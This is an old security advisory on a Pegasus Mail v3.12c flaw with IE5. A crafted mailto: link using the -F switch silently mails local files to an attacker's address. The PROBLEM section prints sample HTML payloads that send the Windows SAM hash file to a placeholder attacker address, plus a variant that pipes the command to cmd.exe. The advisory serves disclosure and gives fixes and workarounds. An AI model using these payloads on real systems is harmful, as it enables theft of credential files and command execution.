COMMAND

    Pegasus

SYSTEMS AFFECTED

    Pegasus Mail v3.12c with IE5.0

PROBLEM

    Imran Ghory found following.  When using the following html,

        <a href="mailto:hacker@hakersite.com -F c:\test.txt"> Click here</a>

    When  the  user   clicks  on  "Click   here"  Pegasus  mail   will
    automatically  creates  a  message  which  has  a copy of the file
    "c:\test.txt"  and  is  addressed  to  "hacker@hakersite.com"  and
    queues it ready to be sent without any further user intervention.

    If  instead  of  "hacker@hakersite.com"  we  have  a  local  user,
    "hacker" the message won't be queued but just sent immediately.

    Imagine a page like:

        <body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._">

    There goes your user account/hash database.  What about pipes:

        <body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._ | cmd.exe /c echo I can any command I want">

    Please note that the URL as presented in the report will not  work
    correctly on the majority of  systems - Pegasus Mail requires  the
    formal RFC1738 syntax for URLs containing spaces.  But if properly
    represented, it could produce the described effect.

SOLUTION

    Pegasus  currently  has  a  replacement  component  in development
    which handles the link between the browser and Pegasus Mail:  this
    component was developed primarily to deal with other non-security-
    related problems,  but they  will add  some code  to it  to detect
    links  that  send  files  (something  that  should never happen in
    normal  use)  and  release  it  publicly  as  soon  as  is humanly
    possible.

    Workarounf  is  is  to  NOT  configure  Pegasus  to be the default
    mailer for IE.  This is, unfortunately a user specified option  at
    install time,  not the  default.   Also, queuing  of outgoing mail
    allows for pre-delivery review.  A pain, but until a fix, this  is
    it.

    Be aware, the -F switch will only include a file in the body of  a
    message;  it  will  NOT  attach  a  binary.   The  -B  switch will
    accomplish this from  the commandline, but  not via IE.   It seems
    this is  more of  an IE  mailto: implementation  issue more than a
    Pmail one.

    WSendTo  is  a  Pegasus  Mail  add-on  utility  that  improves the
    integration between Microsoft Internet Explorer and Pegasus  Mail.
    It also  adds Pegasus  Mail as  an option  on the Windows Explorer
    "Send  To"  menu  and  protects  against a potential security hole
    discovered recently  by a  member of  the BugTraq  forum.  WSendTo
    requires Windows 95OSR2  or later or  Windows NT4.0 or  later, and
    works with  either the  16- or  32-bit versions  of Pegasus  Mail.
    WSendTo can be downloaded from http://www.pmail.com.